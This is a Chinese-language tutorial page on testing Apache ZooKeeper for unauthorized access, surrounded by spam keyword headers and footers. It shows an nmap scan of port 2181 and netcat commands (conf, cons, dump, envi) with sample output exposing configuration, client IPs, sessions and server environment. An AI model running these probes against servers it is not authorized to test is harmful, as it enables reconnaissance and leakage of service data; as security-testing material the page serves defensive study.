国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網(wǎng)站 > 幫助中心 > 正文

Zookeeper未授權訪問測試問題

2024-07-09 22:40:44
字體:
來源:轉載
供稿:網(wǎng)友

前言

  ZooKeeper是一個分布式的,開放源碼的分布式應用程序協(xié)調服務,是Google的Chubby一個開源的實現(xiàn),是Hadoop和Hbase的重要組件。它是一個為分布式應用提供一致性服務的軟件,提供的功能包括:配置維護、域名服務、分布式同步、組服務等。

  zookeeper 未授權訪問是指安裝部署之后默認情況下不需要任何身份驗證,從而導致 zookeeper 被遠程利用,導致大量服務級別的信息泄露。

  默認使用端口:2181、2182。

探測Zookeeper服務開放

  如使用nmap探測某個目標地址是否運行Zookeeper服務,探測2181端口開放。

root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xxStarting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDTNmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx)Host is up (0.016s latency).PORT   STATE SERVICE2181/tcp open eforwardNmap done: 1 IP address (1 host up) scanned in 0.22 seconds

  批量探測僅需修改一下對應的目標地址即可。

獲取信息

conf命令

  輸出相關服務配置的詳細信息,端口、數(shù)據(jù)路徑、日志路徑、session 超時時間,最大連接數(shù)等。

root@kali:~# echo conf | nc xx.xx.xx.xx 2181clientPort=2171dataDir=/opt/data/zookeeper/data/version-2dataLogDir=/opt/data/zookeeper/data/version-2tickTime=2000maxClientCnxns=0minSessionTimeout=4000maxSessionTimeout=40000serverId=0

cons命令

  列出所有連接到當前服務器的客戶端/會話的詳細信息。

root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more/10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397)/10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)

dump命令

  輸出未處理的會話和臨時節(jié)點,leader 節(jié)點有效。

root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | moreSessionTracker dump:Session Sets (21):0 expire at Thu Jan 29 12:38:08 CST 1970:0 expire at Thu Jan 29 12:38:10 CST 1970:3 expire at Thu Jan 29 12:38:12 CST 1970:0x1000000e01f00130x1000000e029fdde0x1000000e029fe052 expire at Thu Jan 29 12:38:14 CST 1970:0x1000000e02a42350x1000000e01f00e931 expire at Thu Jan 29 12:38:16 CST 1970:0x1000000e01f067a0x1000000e02a423c0x1000000e01f00080x1000000e029fdf4...

  非 leader 節(jié)點看不到什么相關信息。

envi命令

  輸出服務器的詳細信息。

root@kali:~# echo envi | nc xx.xx.xx.xx 2181Environment:zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on 06/29/2018 04:05 GMThost.name=c1b69852-ac24-11e8-88d9-a4bf01306d06java.version=1.7.0_80java.vendor=Oracle Corporationjava.home=/usr/java/jdk1.7.0_80/jrejava.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/libjava.io.tmpdir=/tmpjava.compiler=<NA>os.name=Linuxos.arch=amd64os.version=3.10.0-327.36.3.el7.x86_64user.name=rootuser.home=/rootuser.dir=/
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 读书| 巴彦县| 汉源县| 平原县| 阿拉善盟| 郎溪县| 辽阳县| 扶余县| 湖南省| 谷城县| 团风县| 林州市| 马关县| 项城市| 新田县| 绥化市| 峡江县| 扎兰屯市| 贵南县| 乐安县| 莒南县| 虎林市| 基隆市| 衡阳市| 醴陵市| 永修县| 平原县| 库伦旗| 锡林浩特市| 晋州市| 阿克陶县| 河西区| 广汉市| 广元市| 阜阳市| 陇川县| 庐江县| 阜宁县| 溧水县| 峡江县| 休宁县|